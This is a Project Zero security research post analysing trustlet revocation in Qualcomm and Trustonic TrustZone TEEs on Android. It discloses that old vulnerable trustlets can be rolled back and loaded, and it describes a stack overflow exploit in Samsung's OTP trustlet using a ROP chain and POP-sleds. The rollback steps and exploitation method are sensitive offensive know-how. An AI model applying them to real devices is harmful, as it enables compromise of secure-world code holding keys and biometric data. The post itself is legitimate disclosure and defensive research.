Trust Issues: Exploiting TrustZone TEEs

Google Project Zero - Mon, 07/24/2017 - 12:39
Posted by Gal Beniamini, Project Zero
Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process a wide range of personal and private information of a sensitive nature, such as biometric identifiers, payment data and cryptographic keys. Additionally, modern content protection schemes demand a high degree of confidentiality, requiring stricter guarantees than those offered by the “regular” operating system.
In response to these use-cases and more, mobile device manufacturers have opted for the creation of a “Trusted Execution Environment” (TEE), which can be used to safeguard the information processed within it. In the Android ecosystem, two major TEE implementations exist - Qualcomm’s QSEE and Trustonic’s Kinibi (formerly <t-base). Both of these implementations rely on ARM TrustZone security extensions in order to facilitate a small “secure” operating system, within which “Trusted Applications” (TAs) may be executed.
In this blog post we’ll explore the security properties of the two major TEEs present on Android devices. We’ll see how, despite their highly sensitive vantage point, these operating systems currently lag behind modern operating systems in terms of security mitigations and practices. Additionally, we’ll discover and exploit a major design issue which affects the security of most devices utilising both platforms. Lastly, we’ll see why the integrity of TEEs is crucial to the overall security of the device, making a case for the need to increase their defences.
Unfortunately, the design issue outlined in this blog post is difficult to address, and at times cannot be fixed without introducing additional dedicated hardware or performing operations that risk rendering devices unusable. As a result, most Qualcomm-based devices and all devices using Trustonic’s Kinibi TEE versions prior to 400 (that is, all Samsung Exynos devices other than the Galaxy S8 and S8 Plus) remain affected by this issue. We hope that by raising awareness of this issue we will help push for more secure designs in the future.
I would like to note that while the current designs being reviewed may be incompatible with some devices’ use-cases, improved designs are being developed as a result of this research which may be accessible to a larger proportion of devices.

TrustZone TEEs
TrustZone forms a hardware-based security architecture which provides security mechanisms both on the main application processor, as well as across the SoC. TrustZone facilitates the creation of two security contexts; the “Secure World” and the “Normal World”. Each physical processor is split into two virtual processors, one for each of the aforementioned contexts.
As its name implies, the “Secure World” must remain protected against any attacks launched by the “Normal World”. To do so, several security policies are enforced by hardware logic that prevents the “Normal World” from accessing the “Secure World”’s resources. What’s more, as the current security state is accessible on the system bus, peripherals on the SoC can be designated to either world by simply sampling this value.
TrustZone’s software model provides each world with its own copies of both lower privilege levels -- EL0 and EL1. This allows for the execution of different operating system kernels simultaneously - one running in the “Secure World” (S-EL1), while another runs in the “Normal World” (EL1). However, the world-split is not entirely symmetrical; for example, the hypervisor extensions (EL2) are not available in the “Secure World”.
*TOS: Trusted Operating System
On Android devices, TrustZone technology is used among other things to implement small “security-conscious” operating systems within which a set of trusted applications (TAs) may be executed. These TrustZone-based TEEs are proprietary components and are provided by the device’s manufacturers.
To put it in context - what we normally refer to as “Android” in our day to day lives is merely the code running in the “Normal World”; the Linux Kernel running at EL1 and the user-mode applications running at EL0. At the same time, the TEE runs in the “Secure World”; the TEE OS runs in the “Secure World”’s EL1 (S-EL1), whereas trusted applications run under S-EL0.
Within the Android ecosystem, two major TEE implementations exist; Qualcomm’s “QSEE” and Trustonic’s “Kinibi”. These operating systems run alongside Android and provide several key features to it. These features include access to biometric sensors, hardware-bound cryptographic operations, a “trusted user-interface” and much more.
Since the “Secure World”’s implementation is closely tied to the hardware of the device and the available security mechanisms on the SoC, the TEE OSs require support from and integration with the earlier parts of the device’s bootchain, as well as low-level components such as the bootloader.
Lastly, as can be seen in the schematic above, in order for the “Normal World” to be able to interact with the TEE and the applications within it, the authors of the TEE must also provide user-libraries, daemons and kernel drivers for the “Normal World”. These components are then utilised by the “Normal World” in order to communicate with the TEE.

Exploring the TEEs
Like any other operating system, the security of a Trusted Execution Environment hinges on the integrity of both its trusted applications and that of the TEE OS’s kernel itself. The interaction with the TEE’s kernel is mostly performed by the trusted applications running under it. As such, the logical first step to assessing the security of the TEEs would be to get a foothold within the TEE itself.
To do so, we’ll need to find a vulnerability in a trusted application and exploit it to gain code execution. While this may sound like a daunting task, remember that trusted applications are merely pieces of software that process user-supplied data. These applications aren’t written in memory safe languages, and are executed within opaque environments - a property which usually doesn’t lend itself well to security.  
Bearing all this in mind, how can we start analysing the trusted applications in either of these platforms? Recall that the implementations are proprietary, so even the file formats used to store the applications may not be public.
Indeed, in Qualcomm’s case the format used to store the applications was not documented until recently. Nonetheless, some attempts have been made to reverse engineer the format resulting in tools that allow converting the proprietary file format into a regular ELF file. Once an ELF file is produced, it can subsequently be analysed using any run-of-the-mill disassembler. What’s more, in a recent positive trend of increased transparency, Qualcomm has released official documentation detailing the file format in its entirety, allowing more robust research tools to be written as a result.
As for Trustonic, the trusted applications’ loadable format is documented within Trustonic’s publicly available header files. This saves us quite some hassle. Additionally, some plugins are available to help load these applications into popular disassemblers such as IDA.

Now that we’ve acquired the tools needed to inspect the trusted applications, we can proceed on to the next step - acquiring the trustlet images (from a firmware image or from the device), converting them to a standard format, and loading them up in a disassembler.
However, before we do so, let’s take a moment to reflect on the trustlet model!

Revisiting the Trustlet Model
To allow for increased flexibility, modern TEEs are designed to be modular, rather than monolithic chunks of code. Each TEE is designed as a “general-purpose” operating system, capable of loading arbitrary trustlets (conforming to some specification) and executing them within a “trusted environment”.  What we refer to as a TEE is the combination of the TEE’s operating system, as well as the applications running within it.
There are many advantages to this model. For starters, changes to a single trustlet only require updating the application’s binary on the filesystem, without necessitating any change in other components of the TEE. This also allows for the creation of a privilege separation model, providing certain privileges to some trustlets while denying them to others. Perhaps most importantly, this enables the TEE OS to enforce isolation between the trustlets themselves, thus limiting the potential damage done by a single malicious (or compromised) trustlet. Of course, while in principle these advantages are substantial, we’ll see later on how they actually map onto the TEEs in question.
Regardless, while the advantages of this model are quite clear, they are not completely free of charge. Recall, as we’ve mentioned above, that trusted applications are not invulnerable. Once vulnerabilities are found in these applications, they can be used to gain code execution within the TEE (in fact, we’ll write such an exploit later on!).
However, this begs the question - “How can trustlets be revoked once they’ve been found to be vulnerable?”. After all, simply fixing a vulnerability in a trustlet would be pointless if an attacker could load old vulnerable trustlets just as easily.
To answer this question, we’ll have to separately explore each TEE implementation.

QSEE Revocation
As we’ve mentioned above, Qualcomm has recently released (excellent) documentation detailing the secure boot sequence on Qualcomm devices, including the mechanisms used for image authentication. As trusted applications running under QSEE are part of the same general architecture described in this document, we may gain key insights into the revocation process by reviewing the document.
Indeed, Qualcomm’s signed images are regular ELF files which are supplemented by a single special “Hash Table Segment”. This segment includes three distinct components: the SHA-256 digest of each ELF segment, a signature blob, and a certificate chain.

The signature is computed over the concatenated blob of SHA-256 hashes, using the private key corresponding to the last certificate in the embedded certificate chain. Moreover, the root certificate in the chain is validated against a “Root Key Hash” which is stored in the device’s ROM or fused into one-time-programmable memory on the SoC.
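As a sketch, the blob that gets signed can be reproduced in a few lines of Python (a simplification for illustration; segment parsing and the actual RSA verification against the certificate chain are omitted):

```python
import hashlib

def hash_segment_blob(segments):
    """Concatenate the SHA-256 digest of each ELF segment, mirroring the
    layout of the "Hash Table Segment" described above. In the real image,
    the signature is then computed over this concatenated blob."""
    return b"".join(hashlib.sha256(seg).digest() for seg in segments)

# Three stand-in "segments"; the blob holds one 32-byte digest per segment.
blob = hash_segment_blob([b"\x7fELF", b".text", b".data"])
assert len(blob) == 3 * 32
```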
Reading through the document, we quickly come across the following relevant statement:
“The Attestation certificate used to verify the signature on this hash segment also includes additional fields that can bind restrictions to the signature (preventing “rolling back” to older versions of the software image, …”
Ah-ha! Well, let’s keep reading and see if we come across more pertinent information regarding the field in question.
Continuing our review of the document, it appears that Qualcomm has elected to add unique OU fields to the certificates in the embedded chain, denoting several attributes relating to the signature algorithm of the image being loaded. One such field of particular interest to our pursuits is the “SW_ID”. According to the document, this field is used to “bind the signature to a particular version of a particular software image”. Interesting!
The field is comprised of two concatenated values:

The document then goes on to explain:
“...If eFuse values indicated that the current version was ‘1’, then this image would fail verification. Version enforcement is done in order to prevent loading an older, perhaps vulnerable, version of the image that has a valid signature attached.”
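Decoding the field is then trivial, as sketched below (the bit layout, with the version counter in the upper half and the IMAGE_ID in the lower half, is our reading of the documentation):

```python
def split_sw_id(sw_id: int):
    """Split the 64-bit SW_ID OU field into its two concatenated 32-bit
    values: the version counter and the image identifier."""
    return (sw_id >> 32) & 0xFFFFFFFF, sw_id & 0xFFFFFFFF

# A SW_ID of 0x000000000000000C decodes to version 0, IMAGE_ID 0xC
assert split_sw_id(0x000000000000000C) == (0, 0xC)
```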
At this point we have all the information we need. It appears that the subject of image revocation has not eluded Qualcomm -- we’re already off to a good start. However, there are a few more questions in need of an answer yet!
Let’s start by taking a single trustlet, say the Pixel’s Widevine trustlet, and inspecting the value of the SW_ID field encoded in its attestation certificate. As this is a DER-encoded X.509 certificate, we can parse it using “openssl”:

As we can see above, the IMAGE_ID value assigned to the Widevine trustlet is 0xC. But what about the other trustlets in the Pixel’s firmware? Inspecting them reveals a surprising fact -- all trustlets share the same image identifier.
More importantly, however, it appears that the version counter in the Widevine application on the Pixel is 0. Does this mean that no vulnerabilities or other security-relevant issues have been found in that trustlet since the device first shipped? That seems like a bit of a stretch. In order to get a better view of the current state of affairs, we need a little more data.
Luckily, I have a collection of firmware images that can be used for this exact purpose! The collection contains more than 45 different firmware images from many different vendors, including Google, Samsung, LG and Motorola. To collect the needed data, we can simply write a short script to extract the version counter from every trustlet in every firmware image. Running this script on the firmware collection would allow us to assess how many devices have used the trustlet revocation feature in the past to revoke any vulnerable trusted application (since their version counter would have to be larger than zero).
After running the script on my firmware collection, we are greeted with a surprising result: with the exception of a single firmware image, all trustlets in all firmware images contain version number 0.
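For reference, the tallying step of such a script might look as follows (the firmware names and trustlet data below are hypothetical, standing in for the real collection):

```python
from collections import Counter

def summarise_versions(collection):
    """Given {firmware_image: {trustlet: version_counter}}, tally how many
    trustlets carry each version value. Any value above zero would mean
    the revocation feature has been exercised at least once."""
    tally = Counter()
    for trustlets in collection.values():
        tally.update(trustlets.values())
    return tally

# Hypothetical data mirroring the observed result: every counter is zero.
collection = {
    "firmware-a": {"widevine": 0, "keymaster": 0},
    "firmware-b": {"widevine": 0, "fingerprint": 0},
}
assert summarise_versions(collection) == Counter({0: 4})
```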
Putting it all together, this would imply one of two things: either no bugs are ever found in any trustlet, or device manufacturers are failing to revoke vulnerable trustlets.
In fact, we already know the answer to this question. Last year I performed research into the Widevine trustlet as present on the Nexus 6 and found (and exploited) a vulnerability allowing arbitrary code execution within the TEE.
This same vulnerability was also present on a wide variety of other devices from different manufacturers, some of which are also a part of my firmware collection. Nonetheless, all of these devices in my collection (including the Nexus 6) did not revoke the vulnerable trustlet, and as such have remained vulnerable to this issue. While some devices (such as the Nexus 6) have shipped patched versions of the trustlet, simply providing a patched version without incrementing the version counter has no effect whatsoever.
While I do not have a sufficiently large firmware collection to perform a more in-depth analysis, previous assessments have been made regarding the number of affected devices. Regardless, it remains unknown what proportion of these devices have correctly revoked the trustlet.
As it happens, exploiting the issue on “patched” devices is extremely straightforward, and does not require any more privileges than those required by the original version of the exploit. All an attacker would need to do is to place the old trustlet anywhere on the filesystem, and change the path of the trustlet in the exploit (a single string) to point at that new location (you can find an example of such an exploit here).
One might be tempted to suggest several stop-gap mitigations, such as filtering the filesystem path from which trustlets are loaded to ensure that they only originate from the system partition (thus raising the bar for a would-be attacker). However, due to the design of the API used to load trustlets, such filtering is not feasible. QSEECOM, the driver provided by Qualcomm to interact with QSEE, exposes a simple API in which user-space supplies only a buffer containing the trustlet’s binary. This buffer is then passed on to TrustZone, where the trustlet is authenticated and subsequently loaded. Since the driver only receives a blob containing the trustlet itself, it has no “knowledge” of the filesystem path on which the trustlet is stored, making any verification of that path much harder.
Of course, interaction with QSEECOM is restricted to several SELinux contexts. However, a non-exhaustive list of these includes the media server, DRM server, KeyStore, volume daemon, fingerprint daemon and more. Not a short list by any stretch…
So what about devices unaffected by the previously disclosed Widevine vulnerability? It is entirely possible that these devices are affected by other bugs; either still undiscovered, or simply not public. It would certainly be surprising if no bugs whatsoever have been found in any of the trustlets on these devices in the interim.
For example, diffing two versions of the Widevine trustlet in the Nexus 6P shows several modifications, including changes in functions related to key verification. Investigating these changes, however, would require a more in-depth analysis of Widevine and is beyond the scope of this blog post.

Putting all of the above together, it seems quite clear that device manufacturers are either unaware of the revocation features provided by Qualcomm, or are unable to use them for one reason or another.
In addition to the mechanism described above, additional trustlet revocation capabilities exist. Specifically, on devices where a replay protected memory block (RPMB) is available, it can be utilised to store the version numbers for trustlets, instead of relying on an eFuse. In this scenario, the APP_ID OU is used to uniquely identify each trusted application, allowing for more fine-grained control over their revocation.
That being said, in order to leverage this feature, devices must be configured with a specific eFuse blown. Since we cannot easily query the status of eFuses on a large scale, it remains unknown what proportion of devices have indeed enabled this feature. Perhaps one explanation for the lack of revocation is that some devices are either lacking an RPMB, or have not blown the aforementioned eFuse in advance (blowing a fuse on a production device may be a risky operation).
What’s more, going over our firmware collection, it appears that some manufacturers have an incomplete understanding of the revocation feature. This is evidenced by the fact that several firmware images use the same APP_ID for many (and sometimes all) trusted applications, thus preventing the use of fine-grained revocation.
There are other challenges as well - for example, some vendors (such as Google) ship their devices with an unlocked bootloader. This allows users to freely load any firmware version onto the device and use it as they please. However, revoking trustlets would strip users of the ability to flash any firmware version, as once a trustlet is revoked, firmware versions containing trustlets from the previous versions would no longer pass the authentication (and would therefore fail to load). As of now, it seems that there is no good solution for this situation. Indeed, all Nexus and Pixel devices are shipped with an unlocked bootloader, and are therefore unable to make use of the trustlet revocation feature as present today.
One might be tempted once again to suggest naive solutions, such as embedding a whitelist of “allowed” trustlet hashes in the TEE OS’s kernel itself. Thus, when trustlets are loaded, they may also be verified against this list to ensure they are allowed by the current version of the TEE OS. This suggestion is not meritless, but is not robust either. For starters, this suggestion would require incrementing the version counter for the TEE OS’s image (otherwise attackers may roll back that binary as well). Therefore, this method suffers from some of the same drawbacks as the currently used approach (for starters, devices with an unlocked bootloader would be unable to utilise it). It should be noted, however, that rewriting the TEE OS’s image would generally require raw access to the filesystem, which is strictly more restrictive than the current permissions needed to carry out the attack.
Nonetheless, a better solution to this problem (rather than a stop-gap mitigation) is still needed. We hope that by underscoring all of these issues plaguing the current implementation of the revocation feature (leading to it being virtually unused for trustlet revocation), the conversation will shift towards alternate models of revocation that are more readily available to manufacturers. We also hope that device manufacturers that are able to use this feature, will be motivated to do so in the future.
Kinibi Revocation
Now, let’s set our sights on Trustonic’s Kinibi TEE. In our analysis, we’ll use the Samsung Galaxy S7 Edge (SM-G935F) - this is an Exynos-based device running Trustonic’s TEE version 310B. As we’ve already disclosed an Android privilege escalation vulnerability a few months ago, we can use that vulnerability in order to get elevated code execution with the “system_server” process on Android. This allows us greater freedom in exploring the mechanisms used in the “Normal World” related to Trustonic’s TEE.
Unfortunately, unlike Qualcomm, no documentation is available for the image authentication process carried out by Trustonic’s TEE. Be that as it may, we can still start our research by inspecting the trustlet images themselves. If we can account for every single piece of data stored in the trustlet binary, we should be able to identify the location of any version counter (assuming, of course, such a counter exists).
As we’ve mentioned before, the format used by trusted applications in Trustonic’s TEE is documented in their public header files. In fact, the format itself is called the “MobiCore Loadable Format” (MCLF), and harkens back to G&D’s MobiCore TEE, from which Trustonic’s TEE has evolved.
Using the header files and inspecting the binary in tandem, we can piece together the entire format used to store the trustlet’s metadata as well as its code and data segments. As a result, we arrive at the following layout:

At this point, we have accounted for all but a single blob in the trustlet’s binary - indeed, as shown in the image above, following the data segment, there appears to be an opaque blob of some sort. It would stand to reason that this blob would represent the trustlet’s signature (as otherwise that would imply that unsigned trusted applications could be loaded into the TEE). However, since we’d like to make sure that all bits are accounted for, we’ll need to dig deeper and make sure that is the case.
Unfortunately, there appear to be no references in the header files to a blob of this kind. With that in mind, how can we make sure that this is indeed the trustlet’s signature? To do so we’ll need to reverse engineer the loading code within the TEE OS responsible for authenticating and loading trusted applications. Once we identify the relevant code, we should be able to isolate the handling of the signature blob and deduce its format.
At this point, however, this is easier said than done. We still have no knowledge of where the TEE OS’s binary is stored, how it may be extracted, and what code is responsible for loading it into place. However, some related work has been done in the past. Specifically, Fernand Lone Sang of Quarkslab has published a two-part article on reverse-engineering Samsung’s SBOOT on the Galaxy S6. While his work is focused on analysing the code running in EL3 (which is based on ARM’s Trusted Firmware), we’re interested in dissecting the code running in S-EL1 (namely, the TEE OS).
By applying the same methodology described by Fernand, we can load the SBOOT binary from an extracted firmware image into IDA and begin analysing it. Since SBOOT is based on ARM’s Trusted Firmware architecture, all we’d need to do is follow the logic up to the point at which the TEE OS is loaded by the bootloader. This component is also referred to as “BL32” in the ARM Trusted Firmware terminology.

After reversing the relevant code flows, we finally find the location of the TEE OS’s kernel binary embedded within the SBOOT image! In the interest of brevity, we won’t include the entire process here. However, anyone wishing to extract the binary for themselves and analyse it can simply search for the string “VERSION_-+A0”, which denotes the beginning of the TEE OS’s kernel image. As for the image’s base address - by inspecting the absolute branches and the address of the VBAR in the kernel we can deduce that it is loaded into virtual address 0x7F00000.
Alternatively, there exists another (perhaps much easier) way to inspect Kinibi’s kernel. It is a well known fact that Qualcomm supports the execution of not one, but two TEEs simultaneously. Samsung devices based on Qualcomm’s SoCs make use of this feature by loading both QSEE and Kinibi at the same time. This allows Samsung to access features from both TEEs on the same device. However, we’ve already seen how images loaded by Qualcomm’s image authentication module can be converted into regular ELF files (and subsequently analysed). Therefore, we can simply apply the same process to convert Kinibi’s kernel (“tbase”, as present on Samsung’s Qualcomm-based devices) into an ELF file which can then be readily analysed.
Since the file format of trusted applications running under the Kinibi TEE on Qualcomm devices appears identical to the one used on Exynos, it stands to reason that whatever authentication code is present in one is also present in the other.
After some reversing, we identify the relevant logic responsible for authenticating trusted applications being loaded into Kinibi. The microkernel first verifies the arguments in the MCLF header, such as its “magic” value (“MCLF”). Next, it inspects the “service type” of the image being loaded. By following the code’s flow we arrive at the function used to authenticate both system trustlets and drivers - just what we’re after! After analysing this function’s logic, we finally arrive at the structure of the signature blob:

The function extracts the public key information (the modulus and the public exponent). Then, it calculates the SHA-256 digest of the public key and ensures that it matches the public key hash embedded in the kernel’s binary. If so, it uses the extracted public key together with the embedded signature in the blob to verify the signature on the trustlet itself (which is performed on its entire contents up to the signature blob). If the verification succeeds, the trustlet is loaded.
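The verification flow above can be summarised in a short Python sketch (the exact public-key layout being hashed, and the rsa_verify callback, are assumptions used for illustration, not the TEE OS’s actual internals):

```python
import hashlib

def verify_trustlet(trustlet, sig_offset, modulus, exponent,
                    embedded_pubkey_hash, rsa_verify):
    """Mirror the two-step authentication flow described above.
    First, the SHA-256 of the public key (here assumed to be
    modulus || exponent) must match the hash embedded in the kernel
    binary; second, the signature must verify over the trustlet's
    contents up to the signature blob."""
    if hashlib.sha256(modulus + exponent).digest() != embedded_pubkey_hash:
        return False
    return rsa_verify(modulus, exponent,
                      trustlet[:sig_offset], trustlet[sig_offset:])
```

Here rsa_verify stands in for the RSA signature primitive, which the TEE OS implements internally.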
At long last, we are finally able to account for every single bit in the trustlet. But… Something appears to be amiss - where is the version counter located? Out of the entire trustlet’s binary, there is but a single value which may serve this purpose -- the “Service Version” field in the MCLF header. However, it certainly doesn’t seem like this value is being used by the loading logic we traced just a short while ago. Nevertheless, it’s possible that we’ve simply missed some relevant code.
Regardless, we can check whether any revocation using this field is taking place in practice by leveraging our firmware collection once again! Let’s write a short script to extract the service version field from every trusted application and run it against the firmware repository…
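A minimal parser for the field in question might look as follows (the field offset is derived from the mclfHeaderV2_t layout in Trustonic’s public mclf.h header and should be treated as an assumption):

```python
import struct

MCLF_MAGIC = b"MCLF"
# Assumed offset of the serviceVersion field in mclfHeaderV2_t.
SERVICE_VERSION_OFFSET = 72

def service_version(mclf: bytes) -> int:
    """Extract the "Service Version" field from an MCLF trustlet binary."""
    if mclf[:4] != MCLF_MAGIC:
        raise ValueError("not an MCLF image")
    return struct.unpack_from("<I", mclf, SERVICE_VERSION_OFFSET)[0]

# Synthetic header: magic, intro version, zeroed fields, then serviceVersion
hdr = MCLF_MAGIC + struct.pack("<I", 2) + b"\x00" * 64 + struct.pack("<I", 0)
assert service_version(hdr) == 0
```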
...And the results are in! Every single trusted application in my firmware repository appears to use the same version value - “0”. While there are some drivers that use a different value, it appears to be consistent across devices and firmware versions (and therefore doesn’t seem to represent a value used for incremental versions or for revocation). All in all, it certainly seems as though no revocation is taking place.
But that’s still not quite enough. To ensure that no revocation is performed, we’ll need to try it out for ourselves by loading a trustlet from an old firmware version into a more recent version.
To do so, we’ll need to gain some insight into the user-mode infrastructure provided by Trustonic. Let’s follow the execution flow through the process of loading a trustlet - starting at the “Normal World” and ending in the “Secure World”’s TEE. Doing so will help us figure out which user-mode components we’ll need to interact with in order to load our own trustlet.
When a privileged user-mode process wishes to load a trusted application, they do so by sending a request to a special daemon provided by Trustonic - “mcDriverDaemon”. This daemon allows clients to issue requests to the TEE (which are then routed to Trustonic’s TEE driver). One such command can be used to load a trustlet into the TEE.
The daemon may load trustlets from one of two paths - either from the system partition ("/system/app/mcRegistry"), or from the data partition ("/data/app/mcRegistry"). Since in our case we would like to avoid modifying the system partition, we will simply place our binary in the latter path (which has an SELinux context of “apk_data_file”).
While the load request itself issued to the daemon specifies the UUID of the trustlet to be loaded, the daemon only uses the UUID to locate the binary, but does not ensure that the given UUID matches the one encoded in the trustlet's header. Therefore, it’s possible to load any trustlet (regardless of UUID) by placing a binary with an arbitrary UUID (e.g., 07050501000000000000000000000020) in the data partition's registry directory, and subsequently sending a load request with the same UUID to the daemon.
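The daemon’s lookup logic, and the check it omits, can be sketched as follows (the “.tlbin” suffix and the search order are assumptions for illustration; the UUID offset follows the public mclf.h header):

```python
import os

REGISTRY_DIRS = ["/system/app/mcRegistry", "/data/app/mcRegistry"]

def registry_path(uuid_hex: str) -> str:
    """Resolve a trustlet binary the way the daemon does: by file name
    alone, using the UUID supplied in the load request."""
    for directory in REGISTRY_DIRS:
        path = os.path.join(directory, uuid_hex + ".tlbin")
        if os.path.exists(path):
            return path
    raise FileNotFoundError(uuid_hex)

def header_uuid(mclf: bytes) -> str:
    """The UUID actually encoded in the MCLF header (16 bytes at offset 24)."""
    return mclf[24:40].hex()

# The missing check: the daemon never compares the requested UUID against
# header_uuid(binary), so a binary may be registered under any UUID.
```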

Lastly, the communication with the daemon is done via a UNIX domain socket. The socket has an SELinux context which limits the number of processes that can connect to it. Nonetheless, much like in Qualcomm’s case, the list of such processes seems to include the majority of privileged processes running on the system. A very partial list includes the DRM server, the system server, the volume daemon, the media server and indeed any system application (you can find the full list in the issue tracker).
From then on, the daemon simply contacts Trustonic’s driver and issues a specific set of ioctls which cause it to pass on the request to the TEE. It should be noted that access to the driver is also available to quite a wide range of processes (once again, the full list can be seen in the issue tracker).
Now that we’re sufficiently informed about the loading process, we can go ahead and attempt to load an old trustlet. Let’s simply take an old version of the “fingerprint” trustlet and place it into the registry directory under the data partition. After issuing a load request to the daemon and following the dmesg output, we are greeted with the following result:

There we have it -- the trustlet has been successfully loaded into the TEE, confirming our suspicions!
After contacting Samsung regarding this issue, we’ve received the following official response:
“Latest Trustonic kinibi 400 family now supports rollback prevention feature for trustlets and this is fully supported since Galaxy S8/S8+ devices”
Indeed, it appears that the issue has been addressed in the newest version of Trustonic’s TEE - Kinibi 400. Simply searching for relevant strings in the TEE OS binary provided in the Galaxy S8’s firmware reveals some possible hints as to the underlying implementation:

Based on these strings alone, it appears that newer devices utilise a replay protected memory block (RPMB) in order to prevent old trustlets from being rolled back. As the implementation is proprietary, more research is needed in order to determine how this feature is implemented.
With regards to Samsung devices - although revocation appears to be supported in the Galaxy S8 and S8 Plus, all other Exynos-based devices remain vulnerable to this issue. In fact, in the next part we’ll write an exploit for a TEE vulnerability. As it happens, this same vulnerability is present in several different devices, including the Galaxy S7 Edge and Galaxy S6.
Without specialised hardware used to store the version counter or some other identifier which can be utilised to prevent rollback, it seems like there is not much that can be done to address the issue in older devices. Nonetheless, as we have no visibility into the actual security components on the SoC, it is not clear whether a fix is indeed not possible. Perhaps other hardware components could be co-opted to implement some form of revocation prevention. We remain hopeful that a stop-gap mitigation may be implemented in the future.

Deciding On A Target
To make matters more interesting, let’s try and identify an “old” vulnerable trustlet (one which has already been “patched” in previous versions). Once we find such a trustlet, we could simply insert it into the registry and load it into the TEE. As it happens, finding such trustlets is rather straightforward - all we have to do is compare the trustlets from the most recent firmware version with the ones in the first version released for a specific device -- if there have been any security-relevant fixes, we should be able to track them down.
In addition, we may also be able to use vulnerable trustlets from a different device. This would succeed only if both devices share the same “trusted” public key hash embedded in the TEE OS. To investigate whether such scenarios exist, I’ve written another script which extracts the modulus from each trustlet binary and groups together the firmware versions and devices that share the same signing key. Running this script shows that the Galaxy S7 Edge (G935F) and the Galaxy S7 (G930F) use the same signing key. As a result, attackers can load trustlets from either device into the other (thereby expanding the list of possible vulnerable trustlets that can be leveraged to attack the TEE).
After comparing a few trusted applications against their older versions, it is immediately evident that there’s a substantial number of security-relevant fixes. For example, a cursory comparison between the two versions of the “CCM” trustlet (FFFFFFFF000000000000000000000012) revealed four added bounds checks which appear to be security-relevant.

Alternatively, we can draw upon previous research. Last year, while doing some cursory research into the trusted applications available on Samsung’s Exynos devices, I discovered a couple of trivial vulnerabilities in the “OTP” trustlet running under that platform. These vulnerabilities have since been “fixed”, but as the trustlets are not revoked, we can still freely exploit them.
In fact, let’s do just that.

Writing A Quick Exploit
We’ve already determined that old trustlets can be freely loaded into Kinibi TEE (prior to version 400). To demonstrate the severity of this issue, we’ll exploit one of two vulnerabilities I’ve discovered in the OTP trustlet late last year. Although the vulnerability has been “patched”, attackers can simply follow the steps above to load the old version of the trustlet into the TEE and exploit it freely.  
The issue we’re going to exploit is a simple stack overflow. You might rightly assume that such an overflow would be caught by modern exploit mitigations, such as stack cookies. However, looking at the binary, it appears that no such mitigation is present! As we’ll see later on, this isn’t the only mitigation currently missing from Kinibi.
Getting back to the issue at hand, let’s start by understanding the primitive at our disposal. The OTP trustlet allows users to generate OTP tokens using embedded keys that are “bound” to the TrustZone application. Like most other trusted applications, its code generally consists of a simple loop which waits for notifications from the TEE OS informing it of an incoming command.
Once a command is issued by a user in the “Normal World”, the TEE OS notifies the trusted application, which subsequently processes the incoming data using the “process_cmd” function. Reversing this function we can see the trustlet supports many different commands. Each command is assigned a 32-bit “command ID”, which is placed at the beginning of the user’s input buffer.
Following the code for these commands, it is quickly apparent that many of them use a common utility function, “otp_unwrap”, in order to take a user-provided OTP token and decrypt it using the TEE’s TrustZone-bound unwrapping mechanism.
This function receives several arguments, including the length of the buffer to be unwrapped. However, it appears that in most call-sites, the length argument is taken from a user-controlled portion of the input buffer, with no validation whatsoever. As the buffer is first copied into a stack-allocated buffer, this allows us to simply overwrite the stack frame with controlled content. To illustrate the issue, let’s take a look at the placement of items in the buffer for a valid unwrap command, versus their location on the stack when copied by “otp_unwrap”:

As we’ve mentioned, the “Token Length” field is not validated and is entirely attacker-controlled. Supplying an arbitrarily large value will therefore result in a stack overflow. All that’s left now is to decide on a stack alignment using which we can overwrite the return address at the end of the stack frame and hijack the control flow. For the sake of convenience, let’s simply return directly from “otp_unwrap” to the main processing function - “process_cmd”. To do so, we’ll overwrite all the stack frames in-between the two functions.
As an added bonus, this allows us to utilise the stack space available between the two stack frames for the ROP chain of our choice. Choosing to be conservative once again, we’ll elect to write a ROP chain that simply prepares the arguments for a function, executes it, and returns the return value back to “process_cmd”. That way, we gain a powerful “execute-function-in-TEE” primitive, allowing us to effectively run arbitrary code within the TEE. Any read or write operations can be delegated to read and write gadgets, respectively - allowing us to interact with the TEE’s address space. As for interactions with the TEE OS itself (such as system calls), we can directly invoke any function in the trusted application’s address space as if it were our own, using the aforementioned “execute-function” primitive.
Lastly, it’s worth mentioning that the stack frames in the trusted application are huge. In fact, they’re so big that there’s no need for a stack pivot in order to fit our ROP chain in memory (which is just as well, as a short search for one yielded no obvious results). Instead, we can simply store our chain on the stack frames leading from the vulnerable function all the way up to “process_cmd”.
Part of the reason for the exorbitantly large stack frames is the fact that most trusted applications do not initialise or use a heap for dynamic memory allocation. Instead, they rely solely on global data structures for stateful storage, and on the large stack for intermediate processing. Using the stack in such a way increases the odds of overflows occurring on the stack (rather than the non-existent heap). Recall that as there’s no stack cookie present, this means that many such issues are trivially exploitable.
Once we’ve finished mapping out the stack layout, we’re more-or-less ready to exploit the issue. All that’s left is to build a stack frame which overwrites the stored LR register to point at the beginning of our ROP chain’s gadgets, followed by a sequence of ROP gadgets needed to prepare arguments and call a function. Once we’re done, we can simply fill the rest of the remaining space with POP-sleds (that is, “POP {PC}” gadgets), until we reach “process_cmd”’s stack frame. Since that last frame restores all non-scratch registers, we don’t have to worry about restoring state either.

You can find the full exploit code here. Note that the code produces a position-independent binary blob which can be injected into a sufficiently privileged process, such as “system_server”.

Security Mitigations
We’ve already seen how a relatively straightforward vulnerability can be exploited within Kinibi’s TEE. Surprisingly, it appeared that there were few mitigations in place holding us back. This is no coincidence. In order to paint a more complete picture, let’s take a moment to assess the security mitigations provided by each TEE. We’ll perform our analysis by executing code within the TEE and exploring it from the vantage point of a trustlet. To do so, we’ll leverage our previously written code-execution exploits for each platform. Namely, this means we’ll explore Kinibi version 310B as present on the Galaxy S7 Edge, and QSEE as present on the Nexus 6.

ASLR

Kinibi offers no form of ASLR. In fact, all trustlets are loaded at a fixed address (denoted in the MCLF header). Moreover, as the trustlets’ base address is quite low (0x1000), this raises the probability of offset-from-NULL dereference issues being exploitable.
Additionally, each trustlet is provided with a common “helper” library (“mcLib”). This library acts as a shim which provides trusted applications with the stubs needed to call each of the functions supported by the TEE’s standard libraries. It contains a wealth of code, including gadgets to call functions, gadgets that invoke the TEE OS’s syscalls, perform message-passing and much more. And, unfortunately, this library is also mapped into a constant address in the virtual address space of each trustlet (0x7D01000).

Putting these two facts together, any vulnerability found within a trustlet running under Trustonic’s TEE can be exploited without requiring prior information about the address space of the trustlet (thus lowering the bar for remotely exploitable bugs).
